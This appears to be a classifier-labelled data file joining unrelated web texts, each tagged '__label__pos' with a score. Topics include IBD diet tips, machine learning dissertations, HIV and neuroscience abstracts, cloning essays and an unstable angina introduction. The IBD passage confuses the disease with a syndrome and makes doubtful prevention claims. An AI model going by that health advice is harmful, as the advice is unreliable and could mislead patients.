Stop smoking.Smoking worsens treatment outcomes and increases flares-up among patients with Crohn’s disease. Get recommended vaccinations.IBD patients treated with certain medications have a higher risk for infection. Ask your doctorif you should be screened for colorectal cancer. Patients with IBD may need to start screening for colorectal cancer before age 50. If you are a woman with IBD, talk to your doctor about how to prevent cervical cancer. Patients with IBD are at higher risk of cervical cancer. Ask your doctorif you need a bone density test. Certain medications used to treat IBD may increase your risk for osteoporosis. Diet & Nutrition: Diet and nutrition helps to prevent IBD. But diet or food does not initiate IBD. Eat smaller meals at more frequent intervals.Eat five small meals a day, every three or four hours, rather than the traditional three large meals a day. Reduce the amount of greasy or fried foods.High-fat foods may cause diarrhea and gas if fat absorption is incomplete. Watch dairy intake.Persons who are lactose intolerant or who are experiencing IBD or IBS may need to limit the amount of milk or milk productsthey consume. Restrict the intake of certain high-fiber foods.If there is narrowing of the bowel, these foods may cause cramping. High-fiber foods also cause contractions once they enter the large intestine. Because they are not completely digested by the small intestine, these foods may also cause diarrhea. Avoid problem (trigger) foods.Eliminate any foods that make symptoms worse. These may include “gassy” food (such as beans, cabbage and broccoli), spicy food, popcorn and alcohol, as well as foods and drinks that contain caffeine, such as chocolate and soda. Foods to try:Bananas, applesauce, canned varieties of fruit, White bread, crackers made with white flour, plain cereals, White rice, refined pastas, Potatoes without the skin, Cheese (if you’re not lactose intolerant). Smooth peanut butter, Bland soft foods, Cooked vegetables, Canola and olive oils, Low-sugar sports drinks and Crystal Light diluted with water Foods to avoid:Fresh fruit (unless blended or juiced), Prunes, raisins or dried fruit, Uncooked vegetables and raw foods, High-fiber foods (such as fiber-rich breads, cereals, nuts and leafy greens), High-sugar foods, Skins, seeds, popcorn, High-fat foods, Spicy foods, Beans, Some dairy products, Large food portions, Caffeine in coffee, tea and other beverages, Ice-cold liquids (even water) Managing stress helps to reduce IBD symptoms. Getting enough sleep, nurturing body with healthy tips, enough physical activities prevents prolongation and pain caused by IBD.
For more on Inflammatory Bowel Syndrome please visit:
www.cdc.gov http://www.crohnscolitisfoundation.org
Image courtesy: Google, http://theconversation.com
Author: HealthyLife | Posted on: May 18, 2018
|
__label__pos
| 0.528726
|
As a data scientist, an integral part of my work in the field revolves around keeping current with research coming out of academia. I frequently scour arXiv.org for late-breaking papers that show trends and fertile areas of research. Other sources of valuable research developments are in the form of Ph.D. dissertations, the culmination of a doctoral candidate’s work to confer his/her degree. Ph.D. candidates are highly motivated to choose research topics that establish new and creative paths toward discovery in their field of study. In this article, I present 10 compelling machine learning dissertations that I found interesting in terms of my own areas of pursuit. I hope you’ll find several of them that match your own interests. Each thesis may take a while to consume but will result in hours of satisfying summer reading. Enjoy!
[Related Article: The Best Machine Learning Research of 2019 So Far]
Over the past several years, the use of wearable devices has increased dramatically, primarily for fitness monitoring, largely due to their greater sensor reliability, increased functionality, smaller size, increased ease of use, and greater affordability. These devices have helped many people of all ages live healthier lives and achieve their personal fitness goals, as they are able to see quantifiable and graphical results of their efforts every step of the way (i.e. in real-time). Yet, while these device systems work well within the fitness domain, they have yet to achieve a convincing level of functionality in the larger domain of healthcare.
The goal of the research detailed in this dissertation is to explore and develop accurate and quantifiable sensing and machine learning techniques for eventual real-time health monitoring by wearable device systems. To that end, a two-tier recognition system is presented that is designed to identify health activities in a naturalistic setting based on accelerometer data of common activities. In Tier I a traditional activity recognition approach is employed to classify short windows of data, while in Tier II these classified windows are grouped to identify instances of a specific activity.
This dissertation proposes efficient algorithms and provides theoretical analysis through the angle of spectral methods for some important non-convex optimization problems in machine learning. Specifically, the focus is on two types of non-convex optimization problems: learning the parameters of latent variable models and learning in deep neural networks. Learning latent variable models is traditionally framed as a non-convex optimization problem through Maximum Likelihood Estimation (MLE). For some specific models such as multi-view model, it’s possible to bypass the non-convexity by leveraging the special model structure and convert the problem into spectral decomposition through Methods of Moments (MM) estimator. In this research, a novel algorithm is proposed that can flexibly learn a multi-view model in a non-parametric fashion. To scale the nonparametric spectral methods to large datasets, an algorithm called doubly stochastic gradient descent is proposed which uses sampling to approximate two expectations in the problem, and it achieves better balance of computation and statistics by adaptively growing the model as more data arrive. Learning with neural networks is a difficult non-convex problem while simple gradient-based methods achieve great success in practice. This part of the research tries to understand the optimization landscape of learning one-hidden-layer networks with Rectified Linear (ReLU) activation functions. By directly analyzing the structure of the gradient, it can be shown that neural networks with diverse weights have no spurious local optima.
We increasingly depend on algorithms to mediate information and thanks to the advance of computation power and big data, they do so more autonomously than ever before. At the same time, courts have been deferential to First Amendment defenses made in light of new technology. Computer code, algorithmic outputs, and arguably, the dissemination of data have all been determined as constituting “speech” entitled to constitutional protection. However, continuing to use the First Amendment as a barrier to regulation may have extreme consequences as our information ecosystem evolves. This research focuses on developing a new approach to determining what should be considered “speech” if the First Amendment is to continue to protect the marketplace of ideas, individual autonomy, and democracy.
There is much interest in embedding data analytics into sensor-rich platforms such as wearables, biomedical devices, autonomous vehicles, robots, and Internet-of-Things to provide these with decision-making capabilities. Such platforms often need to implement machine learning (ML) algorithms under stringent energy constraints with battery-powered electronics. Especially, energy consumption in memory subsystems dominates such a system’s energy efficiency. In addition, the memory access latency is a major bottleneck for overall system throughput. To address these issues in memory-intensive inference applications, this dissertation proposes deep in-memory accelerator (DIMA), which deeply embeds computation into the memory array, employing two key principles: (1) accessing and processing multiple rows of memory array at a time, and (2) embedding pitch-matched low-swing analog processing at the periphery of bitcell array.
Large and sparse datasets, such as user ratings over a large collection of items, are common in the big data era. Many applications need to classify the users or items based on the high-dimensional and sparse data vectors, e.g., to predict the profitability of a product or the age group of a user, etc. Linear classifiers are popular choices for classifying such data sets because of their efficiency. In order to classify the large sparse data more effectively, the following important questions need to be answered: (a) Sparse data and convergence behavior. How different properties of a data set, such as the sparsity rate and the mechanism of missing data systematically affect convergence behavior of classification? (b) Handling sparse data with non-linear model. How to efficiently learn non-linear data structures when classifying large sparse data? This dissertation attempts to address these questions with empirical and theoretical analysis on large and sparse data sets.
As the size of Twitter data is increasing, so are undesirable behaviors of its users. One such undesirable behavior is cyberbullying, which could lead to catastrophic consequences. Hence, it is critical to efficiently detect cyberbullying behavior by analyzing tweets, in real-time if possible. Prevalent approaches to identifying cyberbullying are mainly stand-alone, and thus, are time-consuming. This dissertation proposes a new approach called distributed-collaborative approach for cyberbullying detection. It contains a network of detection nodes, each of which is independent and capable of classifying tweets it receives. These detection nodes collaborate with each other in case they need help in classifying a given tweet. The study empirically evaluates various collaborative patterns, and it assesses the performance of each pattern in detail. Results indicate an improvement in recall and precision of the detection mechanism over the stand- alone paradigm.
Extreme Learning Machine (ELM) is a training algorithm for Single-Layer Feed-forward Neural Network (SLFN). The difference in theory of ELM from other training algorithms is in the existence of explicitly-given solution due to the immutability of initialed weights. In practice, ELMs achieve performance similar to that of other state-of-the-art training techniques, while taking much less time to train a model. Experiments show that the speedup of training ELM is up to the 5 orders of magnitude comparing to standard Error Back-propagation algorithm. ELM is a recently discovered technique that has proved its efficiency in classic regression and classification tasks, including multi-class cases. In this dissertation, extensions of ELMs for non-typical for Artificial Neural Networks (ANNs) problems are presented.
The subject of manifold learning is vast and still largely unexplored. As a subset of unsupervised learning it has a fundamental challenge in adequately defining the problem but whose solution is to an increasingly important desire to understand data sets intrinsically. It is the overarching goal of this work to present researchers with an understanding of the topic of manifold learning, with a description and proposed method for performing manifold learning, guidance for selecting parameters when applying manifold learning to large scientific data sets and together with open source software powerful enough to meet the demands of big data.
Artificial intelligence and machine learning power many technologies today, from spam filters to self-driving cars to medical decision assistants. While this revolution has hugely benefited from algorithmic developments, it also could not have occurred without data, which nowadays is frequently procured at massive scale from crowds. Because data is so crucial, a key next step towards truly autonomous agents is the design of better methods for intelligently managing now-ubiquitous crowd-powered data-gathering processes. This dissertation takes this key next step by developing algorithms for the online and dynamic control of these processes. The research considers how to gather data for its two primary purposes: training and evaluation.
[Related Article: 25 Excellent Machine Learning Open Datasets]
New computing systems have emerged in response to the increasing size and complexity of modern datasets. For best performance, machine learning methods must be designed to closely align with the underlying properties of these systems. This dissertation illustrates the impact of system-aware machine learning through the lens of optimization, a crucial component in formulating and solving most machine learning problems. Classically, the performance of an optimization method is measured in terms of accuracy (i.e., does it realize the correct machine learning model?) and convergence rate (after how many iterations?). In modern computing regimes, however, it becomes critical to additionally consider a number of systems-related aspects for best overall performance. These aspects can range from low-level details, such as data structures or machine specifications, to higher-level concepts, such as the tradeoff between communication and computation. We propose a general optimization framework for machine learning, CoCoA, that gives careful consideration to systems parameters, often incorporating them directly into the method and theory.
|
__label__pos
| 0.99765
|
Poster presentation Open Published: HIV-1 interacts with human testicular germ cells in vitro Retrovirology volume 10, Article number: P26 (2013) Background
The recent reports of the endogenisation of SIV in primates demonstrate that lentiviruses can infect the germinal lineage. Testicular germ cells (TGC) of both infected men and macaques have been shown to harbor HIV-1/SIV nucleic acids and/or proteins
in situ by several teams including ours. Although HIV-1 binds but cannot enter isolated human spermatozoa, viral DNA has been detected in a few sperm cells from infected men, suggesting a clonal infection of their progenitors, the TGC. In this context, our investigation focused on the ability of human TGC to interact with HIV-1. Materials and methods
TGC were isolated from normal human testes obtained at autopsy or following orchidectomy by enzymatic and mechanical dissociations. The purity of the preparation, as well as the expression of HIV receptors, was evaluated in flow cytometry. HIV-1 (R5 SF162 and primary strains, X4 IIIB and primary strains) binding on TGC untreated or treated with pronase (to remove proteins from the surface) was evaluated by p24 ELISA. The involvement of cellular HIV receptors and of the viral envelope protein Gp120 (env) in HIV-1 attachment was assessed.
Results
TGC preparations, composed of haploid spermatids, tetraploid spermatocytes and diploid spermatogonia and spermatocytes, were on average 94% pure and contained less than 4% of contaminating testicular somatic cells and 2% of CD45+ leukocytes.
As expected, TGC were devoid of CD4. However, they expressed at their membrane heparan sulfate proteoglycans, the mannose receptor and galactocerebroside, as well as CCR3.
Both HIV-1 R5 and X4 strains bound TGC in a dose dependent manner, at either 4° or 37°C. Protease treatment of the cells prior and post HIV exposure drastically reduced viral binding. Heparan sulfate proteoglycans played a predominant role in HIV-1 attachment, as shown by the inhibitory effect of either heparin competitor or heparinase treatment of the cells. The mannose receptor also contributed to a lesser extent to HIV-1 binding with TGC. Gp120 neutralizing antibodies reduced HIV-1 attachment to germ cells. Similarly, the binding of
env-depleted HIV-1 pseudovirus to germ cells was decreased when compared with env-positive pseudovirus. Conclusions
Isolated human testicular germ cells express several alternative HIV receptors and support the attachment of HIV-1 R5 and X4 strains. Heparan sulfate proteoglycans and mannose receptor are mainly involved in the capture of HIV-1 by germ cells. HIV-1 binding to germ cells is partly mediated by the env protein. Whether testicular germ cells can support viral entry and further steps of the viral cycle (e.g. reverse transcription, integration) is under investigation.
Acknowledgements
This work was funded by INSERM, ANRS and Sidaction.
Additional information
Claire Deleage, Giulia Matusali contributed equally to this work.
|
__label__pos
| 0.768186
|
Abstract
The vomeronasal organ (VNO) of mammals plays an essential role in the detection of pheromones. We obtained simultaneous recordings of action potentials from large subsets of VNO neurons. These cells responded to components of urine by increasing their firing rate. This chemosensory activation required phospholipase C function. Unlike most other sensory neurons, VNO neurons did not adapt under prolonged stimulus exposure. The full time course of the VNO spiking response is captured by a simple quantitative model of ligand binding. Many individual VNO neurons were strongly selective for either male or female mouse urine, with the effective concentrations differing as much as a thousandfold. These results establish a framework for understanding sensory coding in the vomeronasal system.
Pheromones of mammals induce complex behaviors and neuroendocrine changes, such as the choice of a mate, territorial defense, the female estrous cycle, and onset of puberty (1, 2). It has been argued that pheromones are detected primarily by the VNO (2, 3). The identification of a large number of putative pheromone receptor genes, grouped into two divergent gene families, suggests that the population of sensory neurons is highly heterogeneous (4–7). Individual glomeruli of the accessory olfactory bulb collect projections from multiple types of VNO receptor neurons, and therefore the sensory code is likely to involve patterns of activity across the receptor population (8,9). We reasoned that such a distributed population code should be observed by simultaneously recording the activity of a large number of VNO neurons in response to natural stimuli. This type of approach might reveal how sex, social dominance, or individual identity are represented by activity patterns in the VNO.
We recorded the action potentials of VNO neurons using a flat array of 61 extracellular electrodes (10). Even in the absence of stimulus, VNO neurons were spontaneously active (11), most of them firing intermittent bursts of spikes (Fig. 1A). When interpreting sensory responses, this pattern of maintained activity poses a hazard: A spontaneous burst may synchronize with the stimulus by chance and may be mistaken for a response. Such chance events may have confounded previous studies (12–14). We overcame this difficulty by delivering stimuli repeatedly, under precise temporal control (15). Of 221 neurons recorded in five preparations, 84 responded reproducibly to dilute urine by increasing their firing rate (see, for example, Fig. 1B). The sensitivity varied considerably across neurons, and the effective urine concentration (relative to undiluted urine) sufficient to elicit a response ranged from <0.0001 to 0.01. In no case did we observe a reproducible stimulus-induced inhibition (13,14).
In addition to pheromones, mouse urine contains urea and potassium ions, which could potentially cause neurons to fire by direct membrane depolarization. Three lines of evidence establish that, instead, a specific chemosensory pathway underlies these responses. First, “artificial urine,” containing the most abundant ionic and organic components of urine (10), did not affect firing, even at a relative concentration of 0.1 (16). Second, in any given VNO, some neurons were far more sensitive to female than to male mouse urine, whereas other neurons displayed an opposite selectivity (discussed further below). Third, responses to urine, but not to potassium ions, depend on a signal transduction cascade: 50 mM potassium excited the neurons, but the kinetics of the response differed sharply from that to urine (Fig. 2A). The onset of the urine response was delayed relative to the potassium response (by 0.33 ± 0.18 s, mean ± SD;
P < 10 −7, if one assumes a gaussian distribution), and it also lasted considerably longer (by 3.1 ± 2.5 s, measuring the difference in exponential decay times; P < 10 −5). Presumably, potassium ions act directly to depolarize the membrane, whereas dilute urine achieves this only through a slower sensory transduction mechanism. A similar response delay occurs when odorants are presented to dissociated neurons of the main olfactory epithelium (17).
To obtain direct evidence for a signal transduction cascade, we applied pharmacological agents to the neuroepithelium. An inhibitor of phospholipase C, 10 μM U-73122 (18, 19), blocked spiking responses to urine but not to potassium (Fig. 2B). A nearly inactive structural analog, U-73343 (18), had no measurable effect on the response to urine. An inhibitor of phosphodiesterase, 500 μM isobutyl methylxanthine (IBMX), also had no effect on firing activity (44 cells). These results indicate that the response of VNO neurons to urine components involves the specific activation of an intracellular signal transduction pathway. Moreover, they identify phospholipase C–β (PLC-β) as a key element of the cascade and also confirm that cyclic nucleotides are not essential (20, 21). Molecular similarity has been found between the signaling pathways of mammalian VNO neurons and
Drosophila photoreceptors, including specific expression of ion channels of the TRP family (22). Requirement for PLC-β function in the VNO parallels the involvement of the NorpA protein in the Drosophila eye (23) and provides additional support for similarity between the two pathways.
Having established the specificity of these VNO responses, we proceeded to a quantitative analysis of sensory coding. In most sensory systems (24, 25), a sustained stimulus causes the primary receptor cells to adapt by altering their sensitivity. For example, olfactory receptor cells change their dose-response relation within seconds (26). In contrast, we found little or no adaptation in VNO neurons during a 100-s presentation of 300-fold diluted urine (Fig. 3). Previous work showed that mouse VNO neurons fire at a steady rate when driven with intracellular current injection (21). Our results demonstrate that the entire chemo-transduction process fails to adapt. The primary purpose of adaptation in other sensory systems is to retain sensitivity to variations in stimulus intensity over a wide range of background intensities. Such a facility may not be biologically relevant for pheromone detection. Given the relatively slow access of stimuli to the VNO (27), the need to detect minute amounts of pheromones, and the long-lasting impact of pheromone detection on the organism, adaptation might indeed be undesirable.
These observations led us to formulate a model in which the firing rate directly represents the occupancy of a pheromone receptor, as determined by first-order binding kinetics. We suppose that each neuron has just one receptor type and that each receptor molecule exists in one of two states, either unoccupied or bound to its ligand. At ligand concentration
C, transitions to the bound state occur at rate k + = κ C; reversion to the unbound state occurs at a rate k − independent of ligand concentration. The firing rate r, averaged across trials, increases with the fraction p of occupied receptors as r = r 0 + α p, where r 0 is the spontaneous firing rate, and the proportionality factor α is the firing rate increase at receptor saturation. From these kinetics, one readily derives the time dependence of the average firing rate following square pulses of ligand application [Eqs. 1 to 3 in (28)]. This model provides a pleasing fit to the kinetics of the response (Fig. 4, A and B). The steady-state firing rate during a prolonged step should follow the Michaelis-Menten law (Eq. 4), which is confirmed by the measurements (Fig. 4, C and D). Thus, one can characterize a neuron's sensitivity to a given stimulus with a single number: the Michaelis constant K m = k −/κ, which corresponds to the concentration that elicits a half-saturating response (29).
An individual neuron, faced with a urine sample of unknown concentration, cannot resolve the sex of the donor animal. On the other hand, a population of cells, with different chemical selectivities, can represent sex and concentration unambiguously. Thus, we measured the Michaelis constants of a population of neurons from a male mouse VNO (Fig. 4E). The sensitivities to both male and female mouse urine were distributed over 2 to 3 orders of magnitude. Nearly half of the neurons showed a clear preference for the sample from one or the other sex. This indicates that their specific ligands are present at different concentrations in male and female mouse urine, at ratios ranging up to 1000-fold. A similar result was obtained in a female mouse VNO (Fig. 4F).
To demonstrate that this observed selectivity is tied to the sex of the donor animal rather than to other characteristics, we tested the same VNO population with two urine samples from different animals of the same sex. The vast majority of neurons had similar Michaelis constants for the two samples: In Fig. 4, G and H, most points lie close to the diagonal (30), whereas they scatter far from the diagonal inFig. 4, E and F. We conclude that the population response of VNO neurons is very sensitive to the sex of the donor. In addition, though, some cells (Fig. 4H) show a clear preference for one of the two male mouse samples, suggesting that these neurons recognize pheromones that vary between individuals of the same sex. Such receptor neurons may contribute to the behavioral recognition of individual differences (1, 2).
The VNOs of both sexes were found to contain neurons specific for the pheromones of either sex. This result is consistent with the fact that all putative pheromone receptors examined so far are expressed in both males and females (4, 5). In addition, more than half of VNO neurons responding to urine stimuli detect cues that are independent of sex. The absence of any clustering of neuronal response types in Fig. 4, E to H, reinforces the notion of a large heterogeneity among VNO sensory neurons, consistent with the existence of over 100 different putative receptor genes (4–7). Pheromone-induced behaviors and endocrine changes clearly involve complex sensory recognition that goes beyond mere sex discrimination, requiring identification of the species, familial status, and even individual identity of animals. The population recording approach described here should help in unraveling the neural code for these variables.
↵* To whom correspondence should be addressed. E-mail:
|
__label__pos
| 0.967942
|
Abstract
This work is a synthesis of research into seismic risk perception in the Pollino area (southern Italy). Over the last 3 years, there has been an ongoing earthquake swarm affecting this area that straddles the border between the regions of Calabria and Basilicata. The perception of seismic risk is an important element in environmental planning. If land is considered in terms of reciprocal interaction between humans and their physical space, Geoethics can find a synthesis between humanistic and scientific knowledge with regard to the theme of disasters. Geoethics can especially help in terms of educating the population of an area about integrated risk management. It is believed that improved communications, awareness of risk complexity and levels of preparation would increase a community's resilience and allow for more effective planning. With this premise, a questionnaire was given to students in primary and secondary education, and to a sample of adults in some of the villages affected by the Pollino earthquake swarm. A comparison with people's mental representation of risk regarding great earthquakes of the past, such as those of Calabria in 1783, helps us to clarify the relationship between an extreme event and a disaster.
© 2015 The Author(s). Published by The Geological Society of London. All rights reserved Please note that if you are logged into the Lyell Collection and attempt to access content that is outside of your subscription entitlement you will be presented with a new login screen. You have the option to pay to view this content if you choose. Please see the relevant links below for further assistance.
|
__label__pos
| 0.760583
|
Trends, Patterns and Issues of Child Malnutrition in Bangladesh Abstract
Good nutrition is a prerequisite for the national development of countries and wellbeing of individuals. Although problems related to poor nutrition affect the entire population, but children and women are especially vulnerable because of their unique physiology and socioeconomic characteristics. Bangladesh is among the top listed countries where the prevalence of malnutrition is highest in the world. According to UNICEF, malnutrition rates have seen a marked decline in Bangladesh throughout the 1990s, but remained high at the turn of the decade. A number of studies have been done by national and international organizations to evaluate the nutritional situation of Bangladesh. According to the latest national study, 41 percent of children under age 5 are stunted, 16 percent are wasted and 36 percent are underweight. The prevalence of anemia among infants, adolescent girls and pregnant women is still at unacceptable levels. The present study is an attempt to determine the trends and patterns of malnutrition among children in Bangladesh. The study also focused on potential issues of child malnutrition in Bangladesh. This study involved an analysis of secondary data and information which have been collected from different sources. The analysis shows a clear picture of the current trend and pattern of malnutrition in Bangladesh. Malnutrition and ill health are traceable partly to economic causes, food
availability and educational factors. Ignorance is perhaps the biggest hurdle facing the silent majority in Bangladesh. Women’s education, knowledge about sound feeding practices and eating habits, growth monitoring and women supportive socio-cultural norms need to be given more emphasis to overcome the present situation. Key words: Child malnutrition, Health, Bangladesh, Child care, Food availability, Poverty, Education, Natural disaster.
|
__label__pos
| 0.67488
|
Artificial Cloning Cloning is a number of different processes that can be used to produce genetically identical copies of a biological entity; in short it is an identical duplicate of something living. Cloning does occur naturally by single celled organism through asexual reproduction, they make a new individual from themselves not having to use a partner, so if cloning is already done by these single celled organisms; why is artificial cloning portrayed so badly in movies and media? Most
Cloning: Is It Ethical? Science today is developing at warp speed. We have the capability to do many things, which include the cloning of actual humans! First you may ask what a clone is? A clone is a group of cells or organisms, which are genetically identical, and have all been produced from the same original cell. There are three main types of cloning, two of which aim to produce live cloned offspring and one, which simply aims to produce stem cells and then human organs. These three are:
The Ethical and Theological Implications of Human Cloning Introduction Advances in science and technology have often caused revolutionary changes in the way society views the world. When computers were first invented, they were used to calculate ballistics tables; today they perform a myriad of functions unimagined at their conception. Space travel changed the way mankind viewed itself in terms of a larger context, the universe. In 1978, the first test tube baby was born in England making
Cloning is one of the most controversial topics in all of science in the current day. Technology has come miles from where it has been, and we still have yet to perfect how it is used. When I chose this topic as one of the two I had to pick from the list, I didn’t really know how cloning worked or how I actually felt about the on-going conversation of whether or not cloning is ethical or moral, much less legal. What I have come to conclude after the various articles I have read, and the different
Cloning and Its Sociobiological Implications Picture this: walking down a street and seeing someone who looks exactly like you. They do the same things as you, act the same way you do, and are exactly alike in several ways. But have people ever considered the consequences of human cloning if it becomes permitted? Human cloning might seem like something out of a science-fiction novel, but it may someday be possible with advances in science and technology. This will result in the creation of several
Outside the lab where the cloning had actually taken place, most of us thought it could never happen. Oh we would say that perhaps at some point in the distant future, cloning might become feasible through the use of sophisticated biotechnologies far beyond those available to us now. But what we really believed, deep in our hearts, was that this one biological feat we could never master. Dr. Lee M. Silver, 1997. On February 23, 1997, Doctor Ian Wilmut successfully cloned the world's first mammal
controversial topic of cloning. Cloning is an exact, precise copy of an organism (“Cloning”). Even though cloning provides many benefits, human cloning is not ethical because it will cost a tremendous amount of money and time. Cloning will also destroy evolution, and finally each and every human, even a clone, deserves a sense of individuality. As mentioned earlier, cloning is the copying of an organism that results in identical offspring (“Cloning”). Scientists have tried cloning many times on frogs
be "duplicated." Cloning sheep and other nonhuman animals seemed more ethically benign to some than potentially cloning people. In response to such concerns in the United States, President Clinton signed a five-year moratorium on federal funding for human cloning the same year of Dolly 's arrival [source: Lamb]. Human cloning has become one of the most debated topics among people in the world regarding the ethical implications. In past polls by TIME magazine (The Ethics of Cloning, 1998), it was shown
Cloning is the process of making copies of individuals that occur in nature such as bacteria, insects, plants, invertebrates or vertebrates. The copy is called clones. Clones are genetically identical to their original parent. Development of cloned animals, which have been genetically engineered to produce valuable proteins in their milk. These have uses in medicine, cloning can also save animals from extinction. Cloning would open doors to even more powerful technologies of human genetic information
Moral, Social, and Ethical Implications of Cloning “Clones are organisms that are exact genetic copies. Every single bit of their DNA is identical. Clones can happen naturally—identical twins are just one of many examples. Or they can be made in the lab. Natural identical twins are similar to and different from clones made through modern cloning technologies.” (Genetic Science Learning Center) Cloning has many different aspects; there is the moral, social and ethical aspects of cloning. Along with this
|
__label__pos
| 0.952711
|
Water and Health
Your body uses
water in all its cells, organs, and tissues to help regulate its temperature and maintain other bodily functions.
How many days can a human survive without water? Not many. Water is life, and we all know that. It is one of the first words that a child learns. Years of acquaintance with this word and most individuals still remain oblivious to the health benefits of drinking water. Today, take some time out to […]
|
__label__pos
| 0.543406
|
Summary 3
I. introduction 4
II. the cyanobacteria 7
III. the heterocyst 9
1. Function and metabolism 9
2. Heterocyst structure 12
(a) Overview 12
(b) The polysaccharide (homogeneous) layer 12
(c) The glycolipid (laminated) layer 12
(d) The septum and microplasmodesmata 12
3. Nitrogen regulation and heterocyst development 12
4. Heterocyst development 13
(a) The proheterocyst 13
(b) Proteolysis associated with heterocyst development 14
(c) RNA polymerase sigma factors 14
(d) Developmental regulation of heterocyst cell wall and nitrogenase gene expression 14
(e) Genome rearrangements associated with heterocyst development 15
5. Genes essential for heterocyst development 15
(a) hetR 15
(b) Protein phosphorylation and the regulation of hetR activity 16
(c) hetR in nonheterocystous cyanobacteria 16
(d) Other heterocyst-specific genes 16
6. Heterocyst spacing 18
(a) Patterns of heterocyst differentiation 18
(b) Genes involved in heterocyst spacing 18
(c) Disruption of heterocyst pattern 18
7. Filament fragmentation and the regression of developing heterocysts 20
8. The nature of the heterocyst inhibitor 20
9. Cell selection during differentiation and pattern formation 20
(a) Cell division 20
(b) DNA replication and the cell cycle 21
(c) Competition 21
10. Models for heterocyst differentiation and pattern control 21
IV. the akinete 23
1. Properties of akinetes 23
2. Structure, composition and metabolism 24
3. Relationship to heterocysts 24
4. Factors that influence akinete differentiation 24
5. Extracellular signals 25
6. Akinete germination 25
7. Genes involved in akinete differentiation 26
V. conclusion 26
Acknowledgements 27
References 28
Cyanobacteria are an ancient and morphologically diverse group of photosynthetic prokaryotes. They were thefirst organisms to evolve oxygenic photosynthesis, and so changed the Earth's atmosphere from anoxic to oxic. Asa consequence, many nitrogen-fixing bacteria became confined to suitable anoxic environmental niches, becausethe enzyme nitrogenase is highly sensitive to oxygen. However, in the cyanobacteria a number of strategies evolvedthat protected nitrogenase from oxygen, including a temporal separation of oxygenic photosynthesis and nitrogenfixation and, in some filamentous strains, the differentiation of a specialized cell, the heterocyst, which provided a suitable microaerobic environment for the functioning of nitrogenase. The evolution of a spore-like cell, theakinete, almost certainly preceded that of the heterocyst and, indeed, the akinete may have been the ancestor ofthe heterocyst. Cyanobacteria have the capacity to differentiate several additional cell and filament types, but thisreview will concentrate on the heterocyst and the akinete, emphasizing the differentiation and spacing of thesespecialized cells.
|
__label__pos
| 0.850654
|
Malone 107
Language suggests information about entities and events—real or imagined. We are interested in inferring such information or meaning, such
semantics, from text. In this dissertation, we build upon and contribute to a decompositional view of semantic prediction which is inherently (1) structured—multi-dimensional with correlation and possibly constraints among the possible semantic questions, (2) graded—predicted quantities represent magnitudes or probabilities rather than binary or categorical values, and (3) subjective. Combining these aspects leads to interesting opportunities for modeling and annotation and raises important questions about the impact of these practices. Specifically, we propose the first structured model for the task of Semantic Proto-Role Labeling, casting the structured problem as a multi-label prediction task which we related empirically to semantic role labeling. We subsequently propose mathematical models of structured ordinal prediction that allow us to incorporate graded annotation and to jointly model multiple annotators. We investigate the decompositional semantic prediction task of Situation Frame Identification (a flavor of topic identification) and propose a graded model for the binary task. Finally, we address issues in efficient scalar annotation.
Adam Teichert is a PhD candidate in the Center for Language and Speech Processing and an Assistant Professor of Software Engineering at Snow College in Ephraim, UT. Before coming to Johns Hopkins, he received a B.S. in Computer Science from Brigham Young University and a MS in Computing from the University of Utah. His research has explored methods for efficient learning and inference in natural language processing with recent focus on structured models and related methods for decompositional semantic labeling and topic identification.
Benjamin Van Durme
Malone 228
TBD
Hackerman Hall B-17
TBD
|
__label__pos
| 0.520766
|
According to the current paradigm, replication foci are discrete sites in the interphase nucleus where assemblies of DNA replication enzymes simultaneously elongate the replication forks of 10-100 adjacent replicons (each approximately 100 kbp). Here we review new results and provide alternative interpretations for old results to show that the current paradigm is in need of further development. In particular, many replicons are larger than previously thought - so large that their complete replication takes much longer (several hours) than the measured average time to complete replication at individual foci (45-60 min). In addition to this large heterogeneity in replicon size, it is now apparent that there is also a corresponding heterogeneity in the size and intensity of individual replication foci. An important property of all replication foci is that they are stable structures that persist, with constant dimensions, during all cell cycle stages including mitosis, and therefore likely represent a fundamental unit of chromatin organization. With this in mind, we present a modified model of replication foci in which many of the foci are composed of clusters of small replicons as previously proposed, but the size and number of replicons per focus is extremely heterogeneous, and a significant proportion of foci are composed of single large replicons. We further speculate that very large replicons may extend over two or more individual foci and that this organization may be important in regulating the replication of such large replicons as the cell proceeds through S-phase.
|
__label__pos
| 0.807741
|
One of the most classic and well-known problems in physics is projectile motion. Tossing a ball in the air, we expect to see it move in a familiar arched path. Under ideal conditions assuming constant gravitational acceleration and negligible air resistance, projectile motion is analytically solvable, i.e., its solutions are expressible in closed-form, known functions. Its properties such as the parabolic path are well explained from introductory physics. Free fall discussed in Chapter 2 is a special case of one-dimensional ideal projectile motion, while the general case is three-dimensional.
To describe realistic projectile motion, we need to consider the effects of air resistance, or drag, which can be significant and interesting. However, the inclusion of these effects renders the problem analytically nonsolvable, and no closed-form solutions are known except under limited conditions. Numerically, this presents no particular difficulty for us, given the toolbox and ODE solvers we just developed in Chapter 2. In fact, realistic projectile motion is an ideal case study for us to begin application of these numerical and visualization techniques to this classic problem in this chapter, for it is relatively simple, intuitive, and its basic features are already familiar to us. We will learn to construct models of appropriate degree of complexity to reflect the effects of drag and spin. Furthermore, we will also discuss the ...
|
__label__pos
| 0.944615
|
in: Oxford scholarship online
Scholars commonly take the Declaration of the Rights of Man and Citizen of 1789, written during the French Revolution, as the starting point for the modern conception of human rights. According to the Declaration, the rights of man are held to be universal, at all times and all places. But as recent crises around migrants and refugees have made obvious, this idea, sacred as it might be among human rights advocates, is exhausted. This book suggests that we need to think of a different idea of universality that exceeds the juridical universialism of the Declaration.
|
__label__pos
| 0.93236
|
INTRODUCTION
Unstable anginais one of the most frequent reasons for hospital admission, and itscourse can also be complicated by a high incidence of inpatientcardiac events. Treatment of unstable angina is controversial,raising issues such as whether treatment combining heparin andaspirin is useful,1 the use of low molecular weightheparin,2,3 the use of IIb-IIIa receptorantagonists,4,5 the choice of a conservative strategy vsan interventionist strategy,6-9 and the new humoralprognostic markers.10
The diversity ofstudy design means studies regarding unstable angina must beperformed with caution, particularly with regard to the followingdata: a) heterogeneity of inclusion criteria, given thatsome studies do not require the presence of electrocardiographychanges during the occurrence of chest pain to classify the episodeas unstable angina,3,6,11-13 and others include patientswith unstable angina and non-Q-wave infarct;1-8,12,14,15b) heterogeneity of medical treatment, which in many casesis left to the discretion of the treating physician,16and c) heterogeneity in the indication for cardiaccatheterization, which in many cases is also left to the discretionof the treating physician.3,5,12,14,15,17 Given thedifferences encountered on these points in various studies, thefrequency rate of hospital episodes shows a certain variabilityfrom one series to the next.
